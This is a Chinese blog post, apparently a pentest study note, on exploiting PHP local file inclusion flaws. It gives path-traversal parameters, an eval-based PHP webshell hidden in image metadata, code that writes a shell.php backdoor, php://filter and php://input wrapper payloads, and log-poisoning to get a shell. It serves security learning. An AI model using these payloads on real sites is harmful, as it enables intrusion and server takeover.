<web渗透-文件包含漏洞利用>

最新推荐文章于 2023-05-31 20:40:35 发布
最新推荐文章于 2023-05-31 20:40:35 发布
阅读量445 收藏 2
点赞数
分类专栏: web渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45540964/article/details/110149531
版权

(1) .读取敏感文件

利用文件包含漏洞读取任意文件,读取文件的时候有利用条件

@目标主机文件存在 (目标文件的绝对路径,相对路径)
@具有文件的可读权限

提交参数
 绝对路径
 ?path=c:\路径\ 
 尝试相对路径
 ?path=..\..\..\..\..\..\路径\

(2) .直接包含图片木马

     将木马信息写入图片附加信息中
     
   图片附加信息 版权等.  
    <?php @eval($_REQUEST[777])?>

     使用菜刀连接

(3) .包含木马写shell

    我们也可以将如下代码写入到图片中
    <?php fputs(fopen('shell.php','w'),
      "<?php @eval(\$_REQUEST[777])?>");
    ?>

     改代码含有是,在当前目录下创建一个名为shell.php 文件
    使用菜刀连接
     http://Ip//shell.php

(4) .PHP封装协议–访问本地文件

   allow_url_include=On

  ?path=file://c:/路径/

(5) .PHP封装协议–传输PHP文件

  ?path=php://filter/read=convert.base64-encode/resoure
    =inc.php
      将inc.php文件展示在页面中,利用base64解码可获取内容

(6) .PHP封装协议–执行php命令

 在burp包头中

   GET /path.php?path=php://input

文本内容执行命令
<?php phpinfo();?>

试题
7 .已知网站存在本地文件包含漏洞,但没有文件上传API(无法上传文件),
如何利用

1.利用网站访问记录日志getshell

    构造http请求包头
    GET /<?php @eval($_REQUEST[777])?> HTTP/1.1


   访问文件包含漏洞
     利用蚁剑连接

    ?path=d:/phpstudy/apache/log/error.log

8 .利用代码自动审计软件
Seay等软件

好先生·
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试技术之本地文件包含
02-01
通过加强对本地文件包含(LFI)渗透测试技术的研究,可以帮助渗透测试人员和学生在未来的渗透测试过程中,识别和测试LFI漏洞。在Web程序渗透测试中,利用本文中的技术发现的LFI漏洞是渗透测试中的典型漏洞。此外,在...
Web漏洞利用
weixin_51102527的博客
04-21 2479
Web漏洞利用 DVWA(Damn Vulnerable Web Application)是randomstorm的一个开源项目。一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA共有十个模块,分别是: 1.Brute Force(密码破解) 2.Command Injection(命令行注入) 3.CSRF(跨站请求伪造) 4.File Inclusion(文件包含) 5.Fi
Web安全文件包含漏洞利用方式
DoubleJing的博客
07-14 182
文件包含漏洞利用方式—伪协议 php://filter 是一种元封装器,设计用于数据流打开时的筛选过滤应用 data:// 同样类似于 php://input,可以让用户来控制输入流 php://input 可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行 phar://xxx.png/shell.php 解压缩包的一个函数,不管后缀是什么,都会当做压缩包来解压。 文件包含漏洞的利用方式—其他 00截断 长度截断( Windows:256, Linux:4096) 包含日志文件
Web漏洞之文件包含漏洞
小赵同学的博客
06-29 964
为了使代码更加灵活,通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。
Web之文件包含漏洞
anan的博客
04-24 358
文件包含简述: 程序员将重复调用的函数写到单个文件中,需要使用时利用函数直接调用文件,这种方式叫做为文件包含 文件包含函数简述: Include() 执行如果发生错误,输出错误信息,包含文件不存在会继续执行 Include_once() 与include函数基本一样,文件只调用一次 Require() 执行如果发生错误,会输出错误并停止脚本执行,包含文件不存在,停止执行 Require_...
web文件包含漏洞
qq_46258964的博客
12-13 1033
文件包含 开发人员会把重复使用的函数写到单个文件中,在使用函数某些特定的时候直接调用此文件称之为文件包含 文件包含漏洞的分类 本地文件包含(服务器上的本地文件) 远程文件包含(包含其他网站上的文件,比如一句话木马) 本地文件包含 无限制 http://127.0.0.0.1:8080/include.php?filename=1.txt http://127.0.0.0.1:8080/include.php?filename=../../../shell.php 有限制 %00截断绕过,PHP版本<
web渗透测试详细入门实践课程-kali/sql注入
06-20
本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源...
Seay-Svn源代码泄露漏洞利用工具.rar
02-18
但一些网站管理员在发布代码时,不愿意使用‘导出’功能,而是直接复制代码文件夹到WEB服务器上,这就使.svn隐藏文件夹被暴露于外网环境,黑客可以借助其中包含的用于版本信息追踪的‘entries’文件,逐步摸清站点...
通过渗透测试确保 Web 应用程序安全-研究论文
06-09
网络犯罪分子利用漏洞很容易窃取ICT的机密数据,... 通过关注SQL注入、跨站脚本、本地文件包含和远程文件包含等高风险漏洞,在本文中,我们查阅了文献,研究了VAPT过程的一般机制,并收集了在VAPT过程中有用的工具。
Web安全-文件包含漏洞
道阻且长,行则将至。
02-05 1423
概述 PHP文件包含 文件包含示例 (1)本地包含
Web安全文件包含漏洞
When you collect everything, you understand nothing.
09-21 574
0x00 文件包含漏洞成因 文件包含漏洞是代码注入的一种。其原理就是注入一段用户能控制的脚本或代码,并让服务器端执行,代码注入的典型代表就是文件包含File inclusion。文件包含可能会出现在jsp、php、asp等语言中。服务器通过函数去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。常见的文件包含的函数如下: PH...
Web的基本漏洞--文件包含漏洞
尽欢的博客
05-31 1316
文件包含漏洞介绍
【web安全】——文件包含漏洞
热门推荐
Demo不是emo的博客
12-02 2万+
文件包含漏洞详解,持续更新中
WEB漏洞-文件操作之文件包含漏洞
Rnan_prince的博客
07-21 225
文件包含漏洞 原理,检测,类型,利用,修复等 文件包含各个脚本代码 ASP,PHP,JSP,ASPX等 <!--#include file="1.asp" --> <!--#include file="top.aspx" --> <c:import url="http://thief.one/1.jsp"> <jsp:include page="head.jsp"/> <%@ include file="head.jsp"%> ..
web安全文件包含漏洞
xlsj雪松的博客
05-26 382
大多数Web语言都可以使用文件包含操作,其中PHP语言所提供的文件包含功能太强大、太灵活,所以包含漏洞经常出现在PHP语言中。 1 PHP文件包含 1.1 原理 PHP中提供了四个文件包含的函数,分别是include()、include_once()、 require()和require_ once()。这四个函数都可以进行文件包含,但作用却不一样,其区别如下: ●require 找不到被包含的文件时会产生致命错误(E COMPILE ERROR),并停止脚本; ●include 找不到被包含的文
web漏洞利用
m0_57934382的博客
05-07 124
首先安装部署好phpStudy+DVWA漏洞演练平台,安装完成后访问http://(本机IP)/DVWA/index.php进入登陆界面登录界面。 其中DVWA的默认用户名是"admin",密码“password”登录。输入用户名密码登录,登陆成功。 登陆后首先将DVWA Security的难度设置为low 密码登陆绕过 打开Brute Force界面,在用户名处输入admin’(使用敏感字符‘),发现程序会报错,随后观察登录系统时地址栏中的sql语句 在用户名密码提交界面上通过注入逻辑.
文件包含漏洞
weixin_48450741的博客
09-20 1593
文件包含漏洞 什么是文件包含 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含文件包含漏洞的成因 程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过就造成了文件包含漏洞。 文件包含漏洞产生的条件 (1)文件包含漏洞利用的前提条件: 1,web 应用采用 incl
Day4-Web漏洞利用
aaaakl的博客
05-07 195
网站中的漏洞一直都让管理人员头痛,我们来了解如何利用web漏洞以提高安全防范意识 首先进行部署行动,DVWA(Damn Vulnerable Web Application)是randomstorm的一个开源项目。一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程,我们以DVWA为工具进行漏洞攻击演练。 一、登录绕过 在用户登录界面输入敏感字符 ' 测试登陆框是否存在注入 发现进
php文件包含漏洞(利用phpinfo)
最新发布
06-28
<h3>回答1:</h3><br/>PHP文件包含漏洞是一种常见的Web安全漏洞,攻击者可以利用该漏洞通过包含恶意文件来执行任意代码。其中,利用phpinfo函数可以获取服务器的详细信息,包括PHP版本、操作系统、配置文件路径等,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值